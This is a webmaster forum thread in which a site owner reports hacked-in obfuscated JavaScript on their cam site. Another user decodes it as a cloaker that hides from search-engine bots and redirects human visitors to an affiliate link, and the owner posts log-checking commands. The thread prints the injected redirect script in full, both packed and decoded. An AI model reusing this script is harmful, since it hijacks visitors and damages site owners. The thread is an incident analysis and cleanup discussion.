Found a script in my site

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • lezinterracial
    Confirmed User
    • Jul 2012
    • 3117

    #1

    Tech Found a script in my site

    This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

    Gonna update my wordpress sites. Change my password. Any other ideas?
    Here is the code I found. Thanks.

    Code:
    <br></br><br></br>
    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDuckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>
    Live Sex Shows
  • just a punk
    So fuckin' bored
    • Jun 2003
    • 32393

    #2
    Originally posted by lezinterracial
    This is from my site bestfreecamgirls.com. I noticed some redirects when backing out of the site.

    Gonna update my wordpress sites. Change my password. Any other ideas?
    Here is the code I found. Thanks.

    Code:
    <br></br><br></br>
    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3=1N;c=z;b.1M=d(){3=1L(d(){4(c==z){x 5=D 1J();5.1K(5.1O()+B*B*24*7*1P);x u=D 1U("(1T\\/|G-1S|G-1Q|k 1R|1I-k|1H|1y|1z|1x|1w|1u-1v|1A-1B|1G|1F|1E|1C|1D|1V|o-1W|o 2g 2f|2e|2c|2d|2h|2i|2n|2m|2l|2j|2k |2b|2a|1t.l|20|1Z|1X|1Y|22|23.E|29|28|27|25|26|2o|L-N|H|J|t|W|S|T|Y|U|V|11 9|Z|Q|X|12|M|P|O|I|K|R|1s|1l|1k|1j|1h|1i|t|1m.13|1r|1q|1p|1o.l|1g.9|18 2|17|16|14|15|19|1a|1e|1c|1b|1d|1f|1n|21|2G|3B|3A-a|3z|3x|3y|3C|3D|3I|3H|3G|3E|3F|3w|2p|v v a|q-p-C.n.r|3v|3n|3m|3l 2 a|3j|3k-3o|3p-3u-2|3t-q-2.n|3s.3q|3K|3J|3Z|47|42|43:41|45-r|49|48|46|44|40|3P 3Q 3O|3N 3L 3M|3R.C|3S|3X|3Y|3W-2|3V|3T|3U|h|3r|3h|E.2I|2H-3i|2E|2F|h|2J|2K|2P|2O|2N|2L|2M|2D|2C|2u|p.2t|2s|2q|2r|2v|2w|2B|2A|y!j-2z|2x 2y-2Q 9|2R)",\'i\');4(!u.3a(39.38)&&f.e.36("g")==-1){f.e="g=1; 37="+5.3b()+"; 3c=/";4(s.3g((s.3f()*10))<10){b.3e.3d("\\35\\F\\F\\34\\2W\\0\\0\\8\\6\\w\\A\\2V\\2U\\A\\2S\\2T\\6\\2X\\8\\0\\8\\6\\0\\w\\2Y\\m\\33\\0\\m")}}c=32}},31)};b.2Z=d(){4(3){30(3)}};',62,258,'x2f||crawler|blur_started1|if|now|x6f||x67|Bot|spider|window|switch_flag1|function|cookie|document|__potus001|Twitterbot|||Google|org|x31|com|FAST|archive|web|bot|Math|dotbot|re|gnam|x32|var||false|x63|60|net|new|bnf|x74|Googlebot|tagoobot|postrank|MJ12bot|turnitinbot|ips|citeseerxbot|agent|twengabot|spbot|CyberPatrol|scribdbot|yanga|buzzbot|yandexbot|purebot|woriobot|voilabot|mlbot|Voyager||Linguee|baiduspider|RU_Bot|domaincrawler|wbsearchbot|Aboundex|ahrefsbot|sistrix|summify|ccbot|ec2linkfinder|seznambot|gslfbot|edisterbot|aihitbot|NerdByNature|blekkobot|ezooms|Adidxbot|linkdex|sitebot|Mail|intelium_bot|europarchive|findthatfile|heritrix|discobot|page2rss|grub|Commons|HttpClient|curl|wget|slurp|java|Python|urllib|phpcrawl|msnbot|nutch|httpunit|libwww|bingbot|Mediapartners|Date|setTime|setTimeout|onblur|null|getTime|1000|Image|favicon|Mobile|googlebot|RegExp|jyxobot|WebCrawler|netresearchserver|speedy|antibot|UsineNouvelleCrawler|facebookexternalhit|fluffy|bibnum||yacybot|AISearchBot|panscient|msrbot|findlink|webcrawler|httrack|teoma|convera|biglotron|Crawler|Enterprise|seekbot|gigablast|GingerCrawler|webmon|ia_archiver|ngbot|exabot|IOI|openindexspider|TweetmemeBot|crawler4j|Applebot|org_bot|Qwantify|findxbot|SemrushBot|Domain|Re|asr|lipperhey|yoozBot|BUbiNG|xovibot|ADmantX|Facebot|yeti|A6|fr_bot|OrangeBot|memorybot|ltx71|nerdybot|SemanticScholarBot|MegaIndex|AdvBot|Animator|AddThis|x6b|x2e|x69|x6c|x3a|x72|x36|onfocus|clearTimeout|5000|true|x37|x70|x68|indexOf|expires|userAgent|navigator|test|toUTCString|path|replace|location|random|floor|smtbot|Indexer|toplistbot|seokicks|content|integromedb|coccoc|robot|it2media|info|cXensebot|siteexplorer|ip|domain|backlinkcrawler|acoonbot|lssbot|careerbot|sogou|lb|RetrevoPageAnalyzer|wotbox|wocbot|drupact|webcompanycrawler|lssrocketcrawler|DuckDuckBot|ichiro|proximic|elisabot|Metadata|Scaper|CC|Service|Lipperhey|SEO|g00g1e|GrapeshotCrawler|SimpleCrawler|Livelapbot|binlar|fr|urlappendbot|brainobot|changedetection|InterfaxScanBot|Search|arabot|WeSEE|psbot|niki|360Spider|blexbot|rogerbot|CrystalSemanticsBot'.split('|'),0,{}));</script>
    Here is the original code:

    Code:
    blur_started1 = null;
    switch_flag1 = false;
    window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){var now = new Date();
    now.setTime(now.getTime()+60*60*24*7*1000);
    var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');
    if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";
    if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}switch_flag1 = true}}, 5000)};
    window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)};
    It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

    P.S. Your site has been hacked.
    Obey the Cowgod

    Comment

    • lezinterracial
      Confirmed User
      • Jul 2012
      • 3117

      #3
      Originally posted by CyberSEO
      Here is the original code:

      Code:
      blur_started1 = null;
      switch_flag1 = false;
      window.onblur = function(){blur_started1 = setTimeout(function(){if(switch_flag1==false){var now = new Date();
      now.setTime(now.getTime()+60*60*24*7*1000);
      var re = new RegExp("(googlebot\/|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)", 'i');
      if(!re.test(navigator.userAgent)&&document.cookie.indexOf("__potus001")==-1){document.cookie = "__potus001=1; expires="+now.toUTCString()+"; path=/";
      if(Math.floor((Math.random()*10))<10){window.location.replace("http://go2click.org/go/2617/1")}}switch_flag1 = true}}, 5000)};
      window.onfocus = function(){if(blur_started1){clearTimeout(blur_started1)};
      It's a cloaker, which redirects SE bots to go2click.org/go/2617/1

      P.S. Your site has been hacked.

      Yep. the go2click redirects to iwantu.com/aff.php?dynamicpage=iwu_wlp_5st_tmr_a&a_bid=dc57a3 f7&utm_sub=opnfnl&utm_source=int&utm_medium=web&ut m_campaign=476cb13b&utm_content=2617&data2=06pvh21 bg0082


      Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know
      Live Sex Shows

      Comment

      • just a punk
        So fuckin' bored
        • Jun 2003
        • 32393

        #4
        Originally posted by lezinterracial
        Thanks CyberSEO. Now, I have to figure out when and how they did it. Maybe some weak PHP on my part. I don't know
        If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid
        Obey the Cowgod

        Comment

        • lezinterracial
          Confirmed User
          • Jul 2012
          • 3117

          #5
          Originally posted by CyberSEO
          If I were you, I would firstly report the rogue affiliate to iwantu.com and make sure he hasn't been paid
          https://help.dreamhost.com/hc/en-us/...ite-was-hacked

          Noticed no world writable directories.
          find . -type d -perm -o=w

          And no logins from any other ips over the past month. I used the command

          last -if /var/log/wtmp.1 | grep youruser | awk '{print $3}' | sort | uniq -c


          Just gotta keep looking through the logs.
          Live Sex Shows

          Comment

          • lezinterracial
            Confirmed User
            • Jul 2012
            • 3117

            #6
            oh well. Searched all through my logs but I couldn't find when this happened. I e-mailed iwantu.org support. Hoping they could help me some with a time frame. But I notice the go2click.org link redirects to different sites.

            I scanned my computer for malware, None found. I went ahead and updated php 5.5 to 5.6. Weird timing causing dreamhost just moved me to a new server this evening.

            Just gonna keep an eye on the files and see if they get modified again. Then I will no where to look in the logs.

            On a positive note. I have learned much today. First time I have used putty to connect to my web server to get a shell. Learned some about PHP hacking.
            Live Sex Shows

            Comment

            Working...